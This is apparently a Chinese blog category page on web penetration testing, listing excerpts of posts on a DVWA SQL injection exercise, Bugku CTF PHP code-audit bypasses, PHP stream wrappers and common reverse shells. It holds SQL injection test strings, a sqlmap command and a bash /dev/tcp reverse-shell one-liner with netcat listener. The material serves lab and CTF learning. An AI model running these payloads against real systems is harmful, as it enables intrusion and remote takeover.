Web渗透
秋叶依剑
岁月静好,一直到老。
展开
-
DVWA SQL注入练习(low级别)
文章目录0x01. 基于布尔检测0x02. 使用sqlmap小总结1. 检测注入2. 获取数据库基本信息0x01. 基于布尔检测1' and '1'='11’ and ‘1’=’2由此可以判断存在SQL注入0x02. 使用sqlmap通过sqlmap 也可以检测注入点sqlmap -u "http://xiaoxiao.com/vulnerabilities/sqli/?i...原创 2019-12-02 00:14:50 · 315 阅读 · 0 评论 -
Bugku代码审计
文章目录Bugku代码审计0x01. extrack 变量覆盖trim()函数payload0x02. strcmp比较字符串strcmp()函数0x03. urldecode二次编码绕过eregi()函数payload0x04. md5()函数payload0x05. 数组返回NULL绕过payloadBugku代码审计0x01. extrack 变量覆盖<?php$flag='x...原创 2019-11-25 02:00:11 · 377 阅读 · 0 评论 -
CTF 中PHP为协议总结
CTF 中PHP为协议总结php://filterphp://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。php://filter 目标使用以下的参数作为它路径的一部分。 复合过...原创 2019-11-09 23:17:01 · 1397 阅读 · 0 评论 -
几种常见反弹shell汇总
0x01. bash在攻击主机上执行端口监听:nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用在目标主机上执行:bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号解释:bash -i 打开一个交互的bash>& 将标准...原创 2019-11-10 01:19:00 · 14573 阅读 · 1 评论